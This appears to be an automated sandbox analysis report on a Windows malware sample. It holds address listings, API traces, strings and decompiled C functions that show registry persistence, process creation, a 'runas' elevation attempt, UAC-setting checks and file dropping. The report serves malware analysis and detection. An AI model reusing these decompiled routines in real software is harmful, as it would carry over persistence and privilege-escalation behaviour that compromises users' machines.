0x0040a4b9
0x00000000
0x0040a4b5
0x0040a497
0x0040a3da
0x0040a406
0x0040a407
0x0040a409
0x0040a40b
0x00000000
0x00000000
0x0040a3e8
0x0040a3eb
0x00000000
0x00000000
0x0040a3ed
0x0040a3f3
0x0040a3f6
0x00000000
0x00000000
0x0040a3f8
0x0040a3f8
0x0040a3f8
0x0040a400
0x0040a400
0x0040a414
0x0040a419
0x00000000
0x00409aa3
0x00409ab0
0x00409ac2
0x00409ac4
0x00409ac4
0x00409ad1
0x00409ae1
0x00409aef
0x00409af4
0x00409af9
0x00409afb
0x00409afb
0x00409af9
0x00409afd
0x00409b14
0x00409b1a
0x00409b26
0x00409b2b
0x00409b33
0x00409b36
0x00409b3b
0x00409b41
0x00409c26
0x00409c2b
0x00409c2e
0x00409c33
0x0040a1de
0x0040a1e4
0x0040a1fd
0x0040a211
0x0040a214
0x0040a219
0x0040a21c
0x0040a21f
0x0040a2e2
0x0040a305
0x0040a308
0x0040a30d
0x0040a310
0x0040a313
0x0040a35a
0x0040a35a
0x0040a35f
0x0040a361
0x0040a3c2
0x00409c05
0x00409c06
0x00409c06
0x0040a363
0x0040a369
0x0040a397
0x0040a397
0x0040a39d
0x0040a3a3
0x0040a3aa
0x0040a3b1
0x0040a3b4
0x0040a3b7
0x00000000
0x0040a3b7
0x0040a36b
0x0040a371
0x0040a374
0x0040a374
0x0040a376
0x0040a377
0x0040a377
0x0040a37d
0x0040a380
0x00000000
0x00000000
0x0040a38e
0x00000000
0x0040a394
0x0040a318
0x0040a31e
0x0040a325
0x0040a327
0x0040a339
0x0040a33b
0x0040a33d
0x0040a340
0x0040a344
0x0040a344
0x0040a34c
0x0040a351
0x0040a354
0x00000000
0x0040a354
0x0040a329
0x0040a32b
0x0040a32e
0x0040a32e
0x0040a330
0x0040a331
0x0040a331
0x0040a337
0x0040a337
0x00000000
0x0040a337
0x0040a228
0x0040a22b
0x0040a231
0x0040a234
0x0040a237
0x0040a27a
0x0040a280
0x0040a281
0x0040a283
0x0040a28e
0x0040a28e
0x0040a28e
0x0040a291
0x0040a294
0x0040a297
0x0040a2a5
0x0040a2ad
0x0040a2b4
0x0040a2b4
0x0040a2b7
0x0040a2b7
0x0040a2bd
0x0040a2d0
0x0040a2d5
0x0040a2d5
0x0040a2d8
0x00000000
0x0040a2d8
0x0040a242
0x0040a245
0x0040a24b
0x0040a24c
0x0040a24e
0x00000000
0x00000000
0x0040a253
0x0040a264
0x0040a26c
0x00000000
0x0040a26c
0x00409c39
0x00409c3f
0x0040a167
0x0040a183
0x0040a190
0x0040a196
0x0040a198
0x0040a198
0x0040a1a2
0x0040a1b3
0x0040a1b6
0x0040a1bc
0x0040a1bf
0x0040a1c5
0x0040a1c7
0x0040a1cc
0x0040a1bf
0x0040a1a2
0x00000000
0x00409c54
0x00409c56
0x00409c5b
0x00409c62
0x00000000
0x00000000
0x00409c74
0x00409c79
0x00409c7c
0x00409c81
0x00000000
0x00409c90
0x00409c94
0x00409c97
0x00409c9a
0x00409e3e
0x00409e3e
0x00409e42
0x0040a155
0x0040a158
0x0040a161
0x00000000
0x00000000
0x00000000
0x0040a161
0x00409e66
0x00409e6b
0x00409e75
0x00409e77
0x0040a14a
0x0040a14d
0x0040a152
0x00000000
0x0040a152
0x00409e98
0x00409e9d
0x00409ea0
0x00409ea2
0x00000000
0x00000000
0x00409eab
0x00409eb0
0x00409ec1
0x00409ec8
0x00409ed5
0x00409edb
0x00409ee3
0x00409ee4
0x00409ee8
0x00409eeb
0x00409ef2
0x00409ef9
0x00409efc
0x00409efd
0x00409f03
0x00409f03
0x00409f08
0x00409f09
0x00409f0e
0x00409f11
0x00409f2d
0x00409f32
0x00409f3b
0x00409f41
0x00409f44
0x00409f46
0x00409f4b
0x00409f4b
0x00409f67
0x00409f6a
0x00409f6a
0x00409f73
0x00409f82
0x00409f8e
0x00409f98
0x00409f9d
0x00409fb4
0x00409fba
0x00409fbc
0x00409fc2
0x00409fc9
0x00409fcf
0x00409fd2
0x00409fd4
0x00409fda
0x00409fda
0x00409fdd
0x00409fe1
0x00409fe7
0x00409feb
0x00409ff1
0x00409ff4
0x00409ff8
0x00409ffb
0x00409ffe
0x0040a004
0x0040a007
0x0040a010
0x0040a025
0x0040a038
0x0040a041
0x0040a046
0x0040a049
0x0040a050
0x0040a05e
0x0040a05e
0x0040a072
0x0040a078
0x0040a07f
0x0040a08d
0x0040a08d
0x0040a093
0x0040a093
0x0040a007
0x00409feb
0x00409fe1
0x0040a09a
0x0040a09d
0x0040a09f
0x0040a0a2
0x0040a0b6
0x0040a0de
0x0040a0e7
0x0040a0ec
0x0040a0fd
0x0040a0fd
0x0040a0a2
0x0040a120
0x0040a126
0x0040a128
0x0040a131
0x0040a137
0x0040a137
0x0040a13a
0x0040a13e
0x0040a140
0x0040a143
0x0040a145
0x0040a145
0x0040a143
0x00000000
0x0040a13e
0x00409ef4
0x00409ef7
0x00000000
0x00000000
0x00000000
0x00409ef7
0x00409cac
0x00409cb2
0x00409cb4
0x00000000
0x00000000
0x00409cd5
0x00409cda
0x00409cdf
0x00000000
0x00000000
0x00409ce9
0x00409cec
0x00409d58
0x00409d59
0x00409d64
0x00409d65
0x00409d6a
0x00409d7a
0x00409d8b
0x00409d9d
0x00409da3
0x00409da3
0x00000000
0x00409cf6
0x00409cf6
0x00409cfc
0x00409cff
0x00409cff
0x00409d01
0x00409d02
0x00409d06
0x00409d0a
0x00409d16
0x00409d16
0x00409d17
0x00409d1b
0x00409d2f
0x00409d2f
0x00409d3e
0x00409d41
0x00409d49
0x00409d4f
0x00409d52
0x00409da5
0x00409da8
0x00409db6
0x00409db6
0x00409db0
0x00409db0
0x00409db0
0x00409db7
0x00409db8
0x00409dbf
0x00409dc3
0x00409dca
0x00409dd1
0x00409dd2
0x00409dd7
0x00409ddc
0x00409e21
0x00409e26
0x00409e29
0x00000000
0x00409dde
0x00409df5
0x00409e0c
0x00409e11
0x00409e16
0x00409e1c
0x00409e2e
0x00409e2e
0x00409e38
0x00000000
0x00409e38
0x00409df9
0x00409dfd
0x00409dff
0x00409dff
0x00409e04
0x00000000
0x00409e04
0x00409d1d
0x00409d1d
0x00409d23
0x00409d2a
0x00409d2d
0x00000000
0x00000000
0x00000000
0x00409d2d
0x00000000
0x00409d23
0x00409d1b
0x00409cec
0x00409c81
0x00409c3f
0x00409b47
0x00409b4a
0x00409b4d
0x00409b56
0x00409b8b
0x00409b92
0x00409b94
0x00409b9f
0x00409b9f
0x00409b9f
0x00409ba4
0x00409ba4
0x00409bb3
0x00409bb8
0x00409bbf
0x00409bbf
0x00409bc2
0x00409bc8
0x00409bde
0x00409be3
0x00409be8
0x00409bfa
0x00409bff
0x00409c02
0x00409c02
0x00409be8
0x00000000
0x00409bc8
0x00409b58
0x00409b5e
0x00409b67
0x00000000
0x00409b69
0x00409b6b
0x00409b7a
0x00409b7f
0x00000000
0x00409b7f
0x00409b67

APIs

SetErrorMode.KERNELBASE(00000003), ref: 00409A7F
SetErrorMode.KERNELBASE(00000003), ref: 00409A83
SetUnhandledExceptionFilter.KERNELBASE(00406511), ref: 00409A8A

Part of subcall function 0040EC54: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040EC5E
Part of subcall function 0040EC54: GetVolumeInformationA.KERNELBASE(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 0040EC72
Part of subcall function 0040EC54: GetTickCount.KERNEL32 ref: 0040EC78

GetModuleHandleA.KERNEL32(00000000,?,0000012C), ref: 00409AB3
GetModuleFileNameA.KERNEL32(00000000), ref: 00409ABA
GetCommandLineA.KERNEL32 ref: 00409AFD
lstrlenA.KERNEL32(?), ref: 00409B99
ExitProcess.KERNEL32 ref: 00409C06
GetTempPathA.KERNEL32(000001F4,?), ref: 00409CAC
lstrcpyA.KERNEL32(?,00000000), ref: 00409D7A
lstrcatA.KERNEL32(?,?), ref: 00409D8B
lstrcatA.KERNEL32(?,0041070C), ref: 00409D9D
GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 00409DED
DeleteFileA.KERNEL32(00000022), ref: 00409E38
GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,000001F4), ref: 00409E6F
lstrcpyA.KERNEL32(?,00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 00409EC8
RtlAllocateHeap.NTDLL(00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 00409ED5
RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000103,?), ref: 00409F3B
RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000022,?,?,?,00000000,00000103,?), ref: 00409F5E
RegCloseKey.ADVAPI32(?,?,?,00000000,00000103,?), ref: 00409F6A
GetModuleHandleA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103), ref: 00409FAD
GetModuleFileNameA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 00409FB4
GetDriveTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 00409FFE
lstrcatA.KERNEL32(00000022,00000000), ref: 0040A038
lstrcatA.KERNEL32(00000022,00410A34), ref: 0040A05E
lstrcatA.KERNEL32(00000022,00000022), ref: 0040A072
lstrcatA.KERNEL32(00000022,00410A34), ref: 0040A08D
wsprintfA.USER32 ref: 0040A0B6
lstrcatA.KERNEL32(00000022,00000000), ref: 0040A0DE
lstrcatA.KERNEL32(00000022,?), ref: 0040A0FD
CreateProcessA.KERNEL32(00000000,00000022,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 0040A120
DeleteFileA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 0040A131
GetModuleHandleA.KERNEL32(00000000,00000022,0000012C), ref: 0040A174
GetModuleFileNameA.KERNEL32(00000000), ref: 0040A17B
GetDriveTypeA.KERNEL32(00000022), ref: 0040A1B6
GetCommandLineA.KERNEL32 ref: 0040A1E5

Part of subcall function 004099D2: lstrcpyA.KERNEL32(?,?,00000100,PromptOnSecureDesktop,00000000,?,00409E9D,?,00000022,?,?,?,?,?,?,?), ref: 004099DF
Part of subcall function 004099D2: lstrcatA.KERNEL32(00000022,00000000,?,?,00409E9D,?,00000022,?,?,?,?,?,?,?,000001F4), ref: 00409A3C
Part of subcall function 004099D2: lstrcatA.KERNEL32(?,00000022,?,?,?,?,?,00409E9D,?,00000022,?,?,?), ref: 00409A52

lstrlenA.KERNEL32(?), ref: 0040A288
StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040A3B7
GetLastError.KERNEL32 ref: 0040A3ED
Sleep.KERNEL32(000003E8), ref: 0040A400
DeleteFileA.KERNEL32(004133D8), ref: 0040A407
CreateThread.KERNEL32(00000000,00000000,0040405E,00000000,00000000,00000000), ref: 0040A42C
WSAStartup.WS2_32(00001010,?), ref: 0040A43A
CreateThread.KERNEL32(00000000,00000000,0040877E,00000000,00000000,00000000), ref: 0040A469
Sleep.KERNEL32(00000BB8), ref: 0040A48A
GetTickCount.KERNEL32 ref: 0040A49F
GetTickCount.KERNEL32 ref: 0040A4B7
Sleep.KERNEL32(00002710), ref: 0040A4C3

Strings

", xrefs: 0040A078
%X%08X, xrefs: 0040A0B0
\, xrefs: 00409D0C
", xrefs: 0040A189
D, xrefs: 00409F8E
P, xrefs: 00409DAA
PromptOnSecureDesktop, xrefs: 00409B14, 00409B19, 00409B32, 00409E65, 00409EAA, 00409F2C, 00409F72, 0040A024, 0040A040, 0040A0CD, 0040A0E6, 0040A14C, 0040A1FC, 0040A210, 0040A2F3, 0040A304
", xrefs: 00409EDB

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrcat$File$Module$CountCreateDeleteErrorHandleNameSleepTicklstrcpy$CommandDriveLineModeProcessThreadTimeTypelstrlen$AllocateAttributesCloseCtrlDispatcherEnvironmentExceptionExitFilterHeapInformationLastOpenPathServiceStartStartupSystemTempUnhandledValueVariableVolumewsprintf
String ID: "$"$"$%X%08X$D$P$PromptOnSecureDesktop$\
API String ID: 2420586017-2824936573
Opcode ID: d87550ebc464f986d405d3fa06ec098ce99decff944eb597e0b9f7931fda3970
Instruction ID: 854f92f710d489262c02351978cf0e467b62b472cea35bfdd38dff102a78baab
Opcode Fuzzy Hash: d87550ebc464f986d405d3fa06ec098ce99decff944eb597e0b9f7931fda3970
Instruction Fuzzy Hash: AB5291B1D40259BBDB11DBA1CC49EEF7BBCAF04304F1444BBF509B6182D6788E948B69

Uniqueness

Uniqueness Score: -1.00%

Function 00409326, Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 284
registryCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00409326(void* __ecx, void* __edx) {
				void* __ebx;
				char _t88;
				void* _t89;
				int _t92;
				void* _t96;
				signed int _t97;
				signed int _t100;
				signed int _t103;
				char* _t106;
				long _t107;
				char* _t111;
				signed int _t112;
				char* _t116;
				signed int _t117;
				int _t119;
				void* _t146;
				signed int _t155;
				int _t161;
				signed int _t165;
				signed int _t167;
				void* _t168;
				void* _t170;
				void* _t172;
				void* _t173;
				void* _t175;
				void* _t176;

				_t146 = __ecx;
				_t168 = _t170 - 0x60;
				E00401910(0x19bc);
				 *(_t168 - 0x58) = 0x9c;
				if(GetVersionExA(_t168 - 0x58) == 0) {
					 *(_t168 - 0x4c) =  *(_t168 - 0x4c) & 0x00000000;
					_t9 = _t168 + 0x58;
					 *_t9 =  *(_t168 + 0x58) & 0x00000000;
					__eflags =  *_t9;
				} else {
					 *(_t168 + 0x58) = ( *(_t168 - 0x54) << 4) +  *((intOrPtr*)(_t168 - 0x50));
				}
				_t88 = GetModuleFileNameA(GetModuleHandleA(0), _t168 - 0x15c, 0x104);
				if(_t88 == 0) {
					 *(_t168 - 0x15c) = _t88;
				}
				_push( *((intOrPtr*)(_t168 + 0x70)));
				_t89 = _t168 - 0x15c;
				if( *(_t168 + 0x78) == 0) {
					_push( *((intOrPtr*)(_t168 + 0x70)));
					_push(_t89);
					_push( *((intOrPtr*)(_t168 + 0x68)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_push( *((intOrPtr*)(_t168 + 0x70)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_push( *((intOrPtr*)(_t168 + 0x6c)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_t92 = wsprintfA(_t168 - 0x95c, E00402544(0x4122f8,  &E00410918, 0xbd, 0xe4, 0xc8));
					_t172 = _t170 + 0x40;
				} else {
					_push(_t89);
					_push( *((intOrPtr*)(_t168 + 0x68)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_push( *((intOrPtr*)(_t168 + 0x70)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_push( *((intOrPtr*)(_t168 + 0x6c)));
					_t92 = wsprintfA(_t168 - 0x95c, E00402544(0x4122f8, 0x4109d8, 0x4d, 0xe4, 0xc8));
					_t172 = _t170 + 0x38;
				}
				 *(_t168 + 0x78) = _t92;
				E0040EE2A(_t146, 0x4122f8, 0, 0x100);
				_t173 = _t172 + 0xc;
				if( *(_t168 + 0x58) >= 0x60 &&  *((intOrPtr*)(_t168 + 0x7c)) != 0) {
					E0040EF00(_t168 - 0x15c, E00406CC9(_t146));
					E0040EF1E(_t168 - 0x15c, E00402544(0x4122f8,  &E0041090C, 0xc, 0xe4, 0xc8));
					_push(_t168 - 0x15c);
					wsprintfA(_t168 +  *(_t168 + 0x78) - 0x95c, E00402544(0x4122f8,  &E00410888, 0x82, 0xe4, 0xc8));
					E0040EE2A(_t146, 0x4122f8, 0, 0x100);
					_t173 = _t173 + 0x50;
				}
				 *(_t168 + 0x78) =  *(_t168 + 0x78) & 0x00000000;
				 *(_t168 + 0x5c) = E00406EDD();
				if( *(_t168 + 0x58) < 0x60) {
					_t165 =  *(_t168 + 0x78);
					_t161 = 0;
					__eflags = 0;
					L33:
					__eflags =  *(_t168 + 0x5c) - _t161;
					if( *(_t168 + 0x5c) == _t161) {
						L38:
						_push(_t168 - 0x95c);
						_push(_t161); // executed
						L39:
						_t96 = E004091EB(); // executed
						__eflags =  *0x412180 - _t161; // 0x0
						if(__eflags != 0) {
							 *0x412180 =  *0x412180 | _t165;
							__eflags =  *0x412180;
						}
						__eflags = _t96 - 0x2a;
						_t81 = _t96 == 0x2a;
						__eflags = _t81;
						_t97 = 0 | _t81;
						L42:
						return _t97;
					}
					_t100 = E00401820(_t168 + 0x54, _t168 + 0x78);
					__eflags = _t100;
					if(_t100 != 0) {
						_push(_t168 - 0x95c);
						_push("runas");
						goto L39;
					}
					_t103 =  *(_t168 + 0x78) | 0x5e060000;
					__eflags = _t103;
					 *0x412180 = _t103;
					 *0x41217c =  *(_t168 + 0x54);
					if(_t103 != 0) {
						 *0x412180 = _t103 | _t165;
					}
					L31:
					_t97 = 0;
					goto L42;
				}
				 *(_t168 + 0x4c) = 4;
				 *(_t168 + 0x44) = 5;
				 *(_t168 + 0x48) = 1;
				_t106 = E00402544(0x4122f8,  &E0041084C, 0x3a, 0xe4, 0xc8);
				_t175 = _t173 + 0x14;
				_t107 = RegOpenKeyExA(0x80000002, _t106, 0, 0x101, _t168 + 0x50); // executed
				if(_t107 == 0) {
					_t111 = E00402544(0x4122f8, 0x410830, 0x1b, 0xe4, 0xc8);
					_t176 = _t175 + 0x14;
					_t112 = RegQueryValueExA( *(_t168 + 0x50), _t111, 0, _t168 + 0x54, _t168 + 0x44, _t168 + 0x4c); // executed
					__eflags = _t112;
					if(_t112 == 0) {
						_t116 = E00402544(0x4122f8, 0x410818, 0x16, 0xe4, 0xc8);
						_t176 = _t176 + 0x14;
						_t117 = RegQueryValueExA( *(_t168 + 0x50), _t116, 0, _t168 + 0x54, _t168 + 0x48, _t168 + 0x4c); // executed
						__eflags = _t117;
						if(_t117 != 0) {
							 *(_t168 + 0x78) = 0x3000;
						}
					} else {
						 *(_t168 + 0x78) = 0x2000;
					}
					RegCloseKey( *(_t168 + 0x50));
					_t165 =  *(_t168 + 0x78);
				} else {
					_t165 = 0x1000;
				}
				_t161 = 0;
				if( *(_t168 + 0x44) != 0 ||  *(_t168 + 0x48) != 0) {
					if( *(_t168 + 0x5c) <= _t161) {
						goto L38;
					}
					_t119 =  *(_t168 - 0x4c);
					if( *(_t168 + 0x58) < 0x61 || _t119 < 0x1db0) {
						 *0x41217c = _t119;
						_t167 = _t165 | 0x5e060106;
						__eflags = _t167;
						goto L30;
					} else {
						if(E0040F0E4(_t168 - 0x95c, _t168 - 0x195c, 0x800) == 0) {
							 *0x41217c = _t161;
							_t167 = _t165 | 0x5e060107;
							L30:
							 *0x412180 = _t167;
							goto L31;
						}
						_t97 = E004018E0(0xc8, _t168 - 0x195c, _t168 + 0x5c, _t168 + 0x78);
						if(_t97 == _t161) {
							_t155 =  *(_t168 + 0x78) | 0x5e060000;
							 *0x412180 = _t155;
							 *0x41217c =  *(_t168 + 0x5c);
							if(_t155 != 0) {
								 *0x412180 = _t155 | _t165;
							}
						}
						goto L42;
					}
				} else {
					goto L33;
				}
			}

0x00409326
0x00409327
0x00409330
0x00409339
0x00409348
0x00409358
0x0040935c
0x0040935c
0x0040935c
0x0040934a
0x00409353
0x00409353
0x00409375
0x0040937d
0x0040937f
0x0040937f
0x0040938c
0x00409394
0x004093a2
0x004093d9
0x004093dc
0x004093dd
0x004093e0
0x004093e3
0x004093e6
0x004093e9
0x004093ec
0x0040940c
0x00409412
0x004093a4
0x004093a4
0x004093a5
0x004093a8
0x004093ab
0x004093ae
0x004093b1
0x004093ce
0x004093d4
0x004093d4
0x0040941d
0x00409420
0x00409425
0x0040942c
0x00409441
0x0040945d
0x0040946b
0x0040948d
0x0040949b
0x004094a0
0x004094a0
0x004094a3
0x004094b0
0x004094b3
0x0040962f
0x00409632
0x00409632
0x00409634
0x00409634
0x00409637
0x0040967b
0x00409681
0x00409682
0x00409683
0x00409683
0x0040968a
0x00409690
0x00409692
0x00409692
0x00409692
0x0040969a
0x0040969d
0x0040969d
0x004096a0
0x004096a2
0x004096a9
0x004096a9
0x00409641
0x00409648
0x0040964a
0x00409673
0x00409674
0x00000000
0x00409674
0x00409652
0x00409652
0x00409657
0x0040965c
0x00409662
0x00409666
0x00409666
0x0040962b
0x0040962b
0x00000000
0x0040962b
0x004094ce
0x004094d5
0x004094dc
0x004094e3
0x004094e8
0x004094f1
0x004094f9
0x0040951a
0x0040951f
0x00409526
0x0040952c
0x0040952e
0x00409551
0x00409556
0x0040955d
0x00409563
0x00409565
0x00409567
0x00409567
0x00409530
0x00409530
0x00409530
0x00409571
0x00409577
0x004094fb
0x004094fb
0x004094fb
0x0040957a
0x0040957f
0x0040958d
0x00000000
0x00000000
0x00409597
0x0040959a
0x0040961a
0x0040961f
0x0040961f
0x00000000
0x004095a3
0x004095c0
0x0040960c
0x00409612
0x00409625
0x00409625
0x00000000
0x00409625
0x004095d1
0x004095db
0x004095e7
0x004095ed
0x004095f3
0x004095f9
0x00409601
0x00409601
0x004095f9
0x00000000
0x004095db
0x00000000
0x00000000
0x00000000

APIs

GetVersionExA.KERNEL32(?,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 00409340
GetModuleHandleA.KERNEL32(00000000,?,00000104,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 0040936E
GetModuleFileNameA.KERNEL32(00000000,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 00409375
wsprintfA.USER32 ref: 004093CE
wsprintfA.USER32 ref: 0040940C
wsprintfA.USER32 ref: 0040948D
RegOpenKeyExA.KERNELBASE(80000002,00000000,?,?,00000000,00000101,?), ref: 004094F1
RegQueryValueExA.KERNELBASE(?,00000000,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00409526
RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00409571

Strings

runas, xrefs: 00409674
PromptOnSecureDesktop, xrefs: 0040938A, 0040939D, 004093BD, 004093FB, 0040941C, 0040944F, 00409478, 0040949A, 004094CD, 00409519, 00409550

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: wsprintf$Module$CloseFileHandleNameOpenQueryValueVersion
String ID: PromptOnSecureDesktop$runas
API String ID: 3696105349-2220793183
Opcode ID: 39fed90ea0b0135417720848aca6477500bc3b8d16e57ae1224dc115a7fc5789
Instruction ID: da9afcecd92b156e9615c74a35b5fd413d23f2be442cf1ef3c4bc4ea64e4b0a2
Opcode Fuzzy Hash: 39fed90ea0b0135417720848aca6477500bc3b8d16e57ae1224dc115a7fc5789
Instruction Fuzzy Hash: 54A181B2540208BBEB21DFA1CC45FDF3BACEB44744F104437FA05A6192D7B999848FA9

Uniqueness

Uniqueness Score: -1.00%

Function 00406A60, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 106
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406A60(int __edx, CHAR* _a4, intOrPtr _a8, int _a12) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				void* _v12;
				long _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				long _v32;
				void* _t31;
				int _t42;
				intOrPtr _t43;
				int _t44;
				void* _t53;
				int _t59;
				CHAR* _t68;
				void* _t69;
				int _t73;

				_t59 = __edx;
				_t68 = _a4;
				_t31 = CreateFileA(_t68, 0x40000000, 0, 0, 2, 0x80, 0); // executed
				_v12 = _t31;
				if(_t31 == 0xffffffff) {
					 *0x412180 = 0x5e060101;
					 *0x41217c = GetLastError();
					__eflags = 0;
					return 0;
				}
				_v8 =  *_t68;
				_v7 = _t68[1];
				_t63 = _a12;
				_v6 = _t68[2];
				_v5 = 0;
				_t42 = GetDiskFreeSpaceA( &_v8,  &_v20,  &_v24,  &_v16,  &_v32); // executed
				if(_t42 == 0) {
					L10:
					_t43 = E00406987(0x500000, _v12, _a8, _a12, _t63); // executed
					_v28 = _t43;
					if(_t43 != 0) {
						_t44 = FindCloseChangeNotification(_v12); // executed
						__eflags = _t44;
						if(_t44 != 0) {
							L15:
							return _v28;
						}
						 *0x412180 = 0x5e060103;
						 *0x41217c = GetLastError();
						CloseHandle(_v12);
						L14:
						DeleteFileA(_t68);
						goto L15;
					}
					 *0x412180 = 0x5e060102;
					 *0x41217c = GetLastError();
					CloseHandle(_v12);
					goto L14;
				}
				_t53 = E0040EB0E(_v20 * _v24, 0, _v16, 0);
				_t69 = _t69 + 0x10;
				_t73 = _t59;
				if(_t73 < 0) {
					goto L10;
				}
				if(_t73 > 0 || _t53 > 0x6400000) {
					_t22 = E0040ECA5() % 0x500000 + 0xa00000; // 0xa00000
					_t63 = _t22;
					goto L10;
				} else {
					__eflags = _t59;
					if(__eflags < 0) {
						goto L10;
					}
					if(__eflags > 0) {
						L9:
						_t63 = (E0040ECA5() & 0x001fffff) + 0x300000;
						__eflags = (E0040ECA5() & 0x001fffff) + 0x300000;
						goto L10;
					}
					__eflags = _t53 - 0x3200000;
					if(_t53 <= 0x3200000) {
						goto L10;
					}
					goto L9;
				}
			}

0x00406a60
0x00406a68
0x00406a7d
0x00406a83
0x00406a89
0x00406b8c
0x00406b9c
0x00406ba1
0x00000000
0x00406ba1
0x00406a91
0x00406a97
0x00406a9e
0x00406aa1
0x00406ab8
0x00406abb
0x00406ac3
0x00406b1d
0x00406b27
0x00406b2f
0x00406b34
0x00406b5f
0x00406b61
0x00406b63
0x00406b86
0x00000000
0x00406b89
0x00406b65
0x00406b78
0x00406b7d
0x00406b7f
0x00406b80
0x00000000
0x00406b80
0x00406b36
0x00406b49
0x00406b4e
0x00000000
0x00406b4e
0x00406ad2
0x00406ad7
0x00406ada
0x00406adc
0x00000000
0x00000000
0x00406ade
0x00406af5
0x00406af5
0x00000000
0x00406afd
0x00406afd
0x00406aff
0x00000000
0x00000000
0x00406b01
0x00406b0a
0x00406b17
0x00406b17
0x00000000
0x00406b17
0x00406b03
0x00406b08
0x00000000
0x00000000
0x00000000
0x00406b08

APIs

CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,73BB81D0,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406A7D
GetDiskFreeSpaceA.KERNELBASE(00409E9D,00409A60,?,?,?,PromptOnSecureDesktop,?,?,?,00409A60,?,?,00409E9D), ref: 00406ABB
GetLastError.KERNEL32(?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B40
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B4E
FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B5F
GetLastError.KERNEL32(?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B6F
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B7D
DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B80
GetLastError.KERNEL32(?,?,?,00409A60,?,?,00409E9D,?,?,?,?,?,00409E9D,?,00000022,?), ref: 00406B96

Strings

PromptOnSecureDesktop, xrefs: 00406A9D

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseErrorLast$FileHandle$ChangeCreateDeleteDiskFindFreeNotificationSpace
String ID: PromptOnSecureDesktop
API String ID: 1251348514-2980165447
Opcode ID: 9d4c85761783c6bedd22d93ddceda0b583ceddf5ed0ddaf9bf98be4dbd44beb2
Instruction ID: d1ca1be21706f377461b54c84c0418c788cbd3a22021bcedc5f811c3684b10f5
Opcode Fuzzy Hash: 9d4c85761783c6bedd22d93ddceda0b583ceddf5ed0ddaf9bf98be4dbd44beb2
Instruction Fuzzy Hash: E131F1B2900108BFDB00DFA09D44ADF7F78EF48314F158076E212F7291D674A9618F69

Uniqueness

Uniqueness Score: -1.00%

Function 0040EC54, Relevance: 4.5, APIs: 3, Instructions: 24
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040EC54() {
				long _v8;
				struct _FILETIME _v16;
				signed int _t11;

				GetSystemTimeAsFileTime( &_v16);
				GetVolumeInformationA(0, 0, 4,  &_v8, 0, 0, 0, 0); // executed
				_t11 = (GetTickCount() ^ _v16.dwHighDateTime ^ _v8) & 0x7fffffff;
				 *0x4136cc = _t11;
				return _t11;
			}

0x0040ec5e
0x0040ec72
0x0040ec84
0x0040ec89
0x0040ec8f

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040EC5E
GetVolumeInformationA.KERNELBASE(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 0040EC72
GetTickCount.KERNEL32 ref: 0040EC78

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Time$CountFileInformationSystemTickVolume
String ID:
API String ID: 1209300637-0
Opcode ID: 317f96d9bc7de3e67904a91eb6120da1bd741d4a36fd8a43a77db32c5f55538a
Instruction ID: 1673bc13977c8672636575d9c8a2f9c2942a42ce341afdc75306ae3be589e196
